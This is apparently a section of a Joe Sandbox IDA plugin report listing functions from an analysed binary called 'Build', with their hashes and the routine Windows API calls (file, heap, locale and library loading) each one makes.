Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: d5d2f284f356431b8856c6e89f23856fb833163d9f14204502030d63e741ec7c
Instruction ID: 7544b01c3827a08744b249bc0295c020d401d48df655c0e0890a6eacd0b7d82d
Opcode Fuzzy Hash: d5d2f284f356431b8856c6e89f23856fb833163d9f14204502030d63e741ec7c
Instruction Fuzzy Hash: E5112131214234AADB11BF32AE05BEE73DC9F09700F000464FA41D7095DB78DE81DB65

Function 0094DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0094DF08

Strings

, xrefs: 0094DF4D

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 9b694f82ad30651cfff1945e32bed0b0877e45ea4f0a3ab3ddecc67e6df23f3c
Instruction ID: f965b8283073ad761ec50fab7ce2c95b4b512eccdbcea57e1793ef58412bb177
Opcode Fuzzy Hash: 9b694f82ad30651cfff1945e32bed0b0877e45ea4f0a3ab3ddecc67e6df23f3c
Instruction Fuzzy Hash: 504108745083889ADF368F248C94FF6BBAEEB45304F1408EDE59A87142D275AE49DF20

Function 0094D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0094D62D

Strings

LCMapStringEx, xrefs: 0094D5CD, 0094D5D7

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 4639bc91314004c6f6f39a8b9cd3cb1bc656db541454e0fe1fcca6e20b3e3d4b
Instruction ID: cb8b8d46cda505ed9c2d7205155459d9d3d994ca6b6661107b6a8b7ea433394b
Opcode Fuzzy Hash: 4639bc91314004c6f6f39a8b9cd3cb1bc656db541454e0fe1fcca6e20b3e3d4b
Instruction Fuzzy Hash: AA015A3250520CBBCF129F91DD02EEE7F66EF8C715F014114FE1866160C6769931EB85

Function 0094D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0094CBBF), ref: 0094D5A5

Strings

InitializeCriticalSectionEx, xrefs: 0094D56B, 0094D575

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 8fe1af185d7b0a61521b817de36c3526d4217da09aae5208d35ea5f2ceff971f
Instruction ID: 42746c1d33e2a5316eac86efc34e6375656ffe161d8886582c3b6fb9f25a4e4c
Opcode Fuzzy Hash: 8fe1af185d7b0a61521b817de36c3526d4217da09aae5208d35ea5f2ceff971f
Instruction Fuzzy Hash: 5FF0593164521CBBCF009F62CC02DADBF60DF88712B004226FC0417260CA715E10E784

Function 0094D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0094D43E

Strings

FlsAlloc, xrefs: 0094D410, 0094D41A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 347c78f1ed8ff75e80f5e7664fe8421e313725a1e94a6ad63347144c00b0de98
Instruction ID: 945642b421824108ebb4eb24f2db06243448b0bb7e4a6837f2af9696957c68ff
Opcode Fuzzy Hash: 347c78f1ed8ff75e80f5e7664fe8421e313725a1e94a6ad63347144c00b0de98
Instruction Fuzzy Hash: 9AE02B30B46318A7D710ABA69C12F7DBBA5CFC8712F800269FC1557290CDB56E40A7DA

Function 009410A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009410BA

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Strings

3To, xrefs: 009410A8, 009410B4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: d4c5590416db6b47b8dc0abaf07d03480c17cc7279bbf61a6d0b2e3b3220004c
Instruction ID: a30593db0af1406786539ce2d5c6b115c6481fcd65decb2c339e66b157d5eb7a
Opcode Fuzzy Hash: d4c5590416db6b47b8dc0abaf07d03480c17cc7279bbf61a6d0b2e3b3220004c
Instruction Fuzzy Hash: B2B012E139D300FC322471C5AC12C36030CC0C0B29330CE2EF804C00C094586CCC5232

Function 0094E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0094DE0B: GetOEMCP.KERNEL32(00000000,?,?,0094E094,?), ref: 0094DE36

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0094E0D9,?,00000000), ref: 0094E2B4
GetCPInfo.KERNEL32(00000000,0094E0D9,?,?,?,0094E0D9,?,00000000), ref: 0094E2C7

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 825eac275802066e30add7c8e9b2f6e3a34521eeda912c1d1017a0a07f3eba74
Instruction ID: eaa48e46238ec21c2b40a488cac6bb97d4456dbf4fcb1bb9e6a3fefe38cbc382
Opcode Fuzzy Hash: 825eac275802066e30add7c8e9b2f6e3a34521eeda912c1d1017a0a07f3eba74
Instruction Fuzzy Hash: 995114719046059FDB26CF75C885EBBBBE9FF81300F1449AED0968B251D739A941CB90

Function 0092B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0092B43B,00000800,00000800,00000000,?,?,0092A31D,?), ref: 0092B5EB
GetLastError.KERNEL32(?,?,0092A31D,?,?,?,?,?,?,?,?), ref: 0092B5FA

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 92079f4139acf9b196316931cd6f503310fc2ad8843220adaa73d0021a8e7cd5
Instruction ID: 08e8f6794ec725a9abc9d3ecf6b8c9fe6ff3358edd94c33d451569207781bb2a
Opcode Fuzzy Hash: 92079f4139acf9b196316931cd6f503310fc2ad8843220adaa73d0021a8e7cd5
Instruction Fuzzy Hash: A441F6316083658BD720AF65E4C4EAE73E9FF58320F10091DF5458B25AD7B8DC808B91

Function 0094E077 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0094B9A5: GetLastError.KERNEL32(?,009650C4,00946E12,009650C4,?,?,0094688D,?,?,009650C4), ref: 0094B9A9
Part of subcall function 0094B9A5: _free.LIBCMT ref: 0094B9DC
Part of subcall function 0094B9A5: SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA1D
Part of subcall function 0094B9A5: _abort.LIBCMT ref: 0094BA23

Part of subcall function 0094E19E: _abort.LIBCMT ref: 0094E1D0
Part of subcall function 0094E19E: _free.LIBCMT ref: 0094E204

Part of subcall function 0094DE0B: GetOEMCP.KERNEL32(00000000,?,?,0094E094,?), ref: 0094DE36

_free.LIBCMT ref: 0094E0EF
_free.LIBCMT ref: 0094E125

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: a769704bd250e63817448fc463f61150190b6b36f54151c9eec08057b3e1f383
Instruction ID: 994087d17906e0e3383b3123acbd82d88f964bb1497ad541e97731cf295ccc84
Opcode Fuzzy Hash: a769704bd250e63817448fc463f61150190b6b36f54151c9eec08057b3e1f383
Instruction Fuzzy Hash: 3631D431908208AFDB10EFA9D481FAD77F9FF84324F2540A9F5149B291EBB69D41DB40

Function 0092B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0092B967,?,?,009287FD), ref: 0092B0A4
CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0092B967,?,?,009287FD), ref: 0092B0D4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 76862c88410273d06cbb8bcbc316fd19354dad5a3d304c1f7a0998b62875ab45
Instruction ID: 953d30b501eace5c6922b7d4b45c48be47fb6461e8ea30829dca7e3115cbf157
Opcode Fuzzy Hash: 76862c88410273d06cbb8bcbc316fd19354dad5a3d304c1f7a0998b62875ab45
Instruction Fuzzy Hash: 7021CC71504384AFE3309F25DC89FB7B7DCEB88324F004A29F9A5C21D5D774A8848B62

Function 0092B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 0092B7FC
SetFileTime.KERNELBASE(?,?,?,?), ref: 0092B8B0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 9e0ed8772d97515a43bca43b13286ddc42713b9cf375c03d667e4a95617b7f2c
Instruction ID: b5524ba54ce88180b40dfd471e8ea2dad194a7bbf10332ae60ee29ad2f4acbbd
Opcode Fuzzy Hash: 9e0ed8772d97515a43bca43b13286ddc42713b9cf375c03d667e4a95617b7f2c
Instruction Fuzzy Hash: B221D0322493919BC715DF25D891ABABBECAF95304F08491CF4C987191D329E90CDB62

Function 00921FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00921FB7
_wcslen.LIBCMT ref: 00922052

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID:
API String ID: 3746244732-0
Opcode ID: c3a67196f1ee7ab7584dfdc27997da425eea828382f54689897d12b4b9d1e4dd
Instruction ID: b5ea2922a6d580d742ff78570bf014353d0c12f6201217a19e9330207c450220
Opcode Fuzzy Hash: c3a67196f1ee7ab7584dfdc27997da425eea828382f54689897d12b4b9d1e4dd
Instruction Fuzzy Hash: DB21AC31940228AFCF11EF94E885EEDB7B6BF88300F10442DF455AB2A1C7795A50CF20

Function 00946192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx,00000000,?,0094613D,009860C8,00000FA0), ref: 00946215
GetProcAddress.KERNEL32(00000000,?), ref: 0094621F

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: b6cc1c7b7b3426844a089ce59ddda34ec8bdfd08531143356ef112acc01de580
Instruction ID: 45d89252b9f706ee3782fd632da647b013c9ab81fd5c9a0455cd8d837360052f
Opcode Fuzzy Hash: b6cc1c7b7b3426844a089ce59ddda34ec8bdfd08531143356ef112acc01de580
Instruction Fuzzy Hash: 2D1103B1608115AF8F23CFA4DC80C9A73A8FB4B3647140169EA25DB301E770ED01DB92

Function 0092B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0092B907
GetLastError.KERNEL32 ref: 0092B914

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 34b513cf18e2272d5587c061de8286dec3b69a07a84c55b7ff4c0e7e3409761f
Instruction ID: 29ac903322e216237c12b799cf4b3a74d07fb4cd8337ff509ef1e5081409e881
Opcode Fuzzy Hash: 34b513cf18e2272d5587c061de8286dec3b69a07a84c55b7ff4c0e7e3409761f
Instruction Fuzzy Hash: 4F110834A04720ABD734D739EC45766B3ECAB45375F600B28E292931D4D774ED85D750

Function 0094BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0094BB55

Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0

HeapReAlloc.KERNEL32(00000000,?,?,?,?,009650C4,0092190A,?,?,00000007,?,?,?,00921476,?,00000000), ref: 0094BB91

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: f84e0e670e36bb4e9b9cd1fc83eaf5cdf19cfbb9ed95c8f5ecaf6d628bf768dd
Instruction ID: 7dd2768f6e56cd4074cb2ca303a0bf458384d57d6537e3854f4d7bf6e8a205bd
Opcode Fuzzy Hash: f84e0e670e36bb4e9b9cd1fc83eaf5cdf19cfbb9ed95c8f5ecaf6d628bf768dd
Instruction Fuzzy Hash: 60F0B432600315AADB212E6AAC41F6B3B5CDFC1BB1F244126F8159B1A5DF34DC01A1AA

Function 0092C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0092BF5E,?,?), ref: 0092C305

Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0092BF5E,?,?), ref: 0092C334

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 9344162d3f8656e8ebe49bfeb726be76efe4e2d1d40b295b93653bf8b42d8796
Instruction ID: 31e0d1c972b6616bdb5631d2926a1dea3a59405ce6d5e07bdea1e622831a2cb5
Opcode Fuzzy Hash: 9344162d3f8656e8ebe49bfeb726be76efe4e2d1d40b295b93653bf8b42d8796
Instruction Fuzzy Hash: ECF09031211229ABDB00DF729C01EEE77ACEF08315F408099B901D7290DA71DE84DBA4

Function 0092BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092BC82

Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59

DeleteFileW.KERNEL32(?,?,?,00000800,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?), ref: 0092BCAE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 94da087a435135b60a95000359abc329f882f0b12e84230f5c739ce173bce929
Instruction ID: 488837116d322734cddec9cc2d7e2f35521454fdee5fe5a80f081fdfabe687f9
Opcode Fuzzy Hash: 94da087a435135b60a95000359abc329f882f0b12e84230f5c739ce173bce929
